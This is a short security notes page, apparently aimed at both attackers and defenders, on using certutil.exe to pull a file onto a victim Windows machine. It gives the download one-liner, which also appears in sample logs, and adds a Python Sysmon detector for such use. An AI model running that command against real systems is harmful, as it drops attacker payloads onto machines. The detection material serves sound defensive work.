Downloading Files with Certutil
Downloading additional files to the victim system using a native OS binary.

Execution

certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe

Observations

Sysmon command-line logging is a good place to start for monitoring suspicious certutil.exe behaviour.
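As an added example (not from the original page), the check below runs over constructed Sysmon Event ID 1 records, shaped like the JSON a log shipper would emit, and flags certutil.exe invocations that combine the -urlcache switch with a URL argument, while ignoring cache listings, store queries, other images and non-process-creation events. The record layout and sample values are assumptions for illustration.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records, shaped like JSON a log shipper
# emits; sample data, not real telemetry. The first mirrors the command on this page.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'"C:\Windows\System32\certutil.exe" -URLCache -split -f https://files.example.test/a.txt'},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache"},          # lists the cache, fetches nothing
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -store My"},          # ordinary store query
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -urlcache http://10.0.0.5/x"},  # not certutil
    {"EventID": 3, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe"},  # not a process-creation event
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # keep quoted Windows paths as one argument
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def tokenize(cmdline):
    """Split a Windows command line into arguments, dropping surrounding quotes."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def certutil_download(event):
    """Describe a certutil URL fetch, or return None.
    Fires only on Event ID 1 where the image is certutil.exe, a -urlcache or /urlcache
    switch appears in any letter case, and some argument is an http/https/ftp URL.
    """
    if event.get("EventID") != 1:
        return None
    image = event.get("Image", "").lower()
    if not (image == "certutil.exe" or image.endswith("\\certutil.exe")):
        return None
    args = tokenize(event.get("CommandLine", ""))[1:]
    switches = {a.lstrip("-/").lower() for a in args if a[:1] in ("-", "/")}
    urls = [a for a in args if URL_RE.match(a)]
    if "urlcache" not in switches or not urls:
        return None
    # Output file, if the operator gave one: the last argument after the URL.
    tail = args[args.index(urls[0]) + 1:]
    outfile = tail[-1] if tail and tail[-1][:1] not in ("-", "/") else None
    return {"url": urls[0], "outfile": outfile, "split": "split" in switches, "force": "f" in switches}

def scan(events):
    """Return (index, finding) pairs for events that look like certutil downloads."""
    return [(i, f) for i, e in enumerate(events) if (f := certutil_download(e)) is not None]
```

Running scan(SAMPLE_EVENTS) reports only the first two records; the URL and output file it extracts are what you would pivot on in Sysmon Event ID 3 (network connection) and Event ID 11 (file create) for the same process.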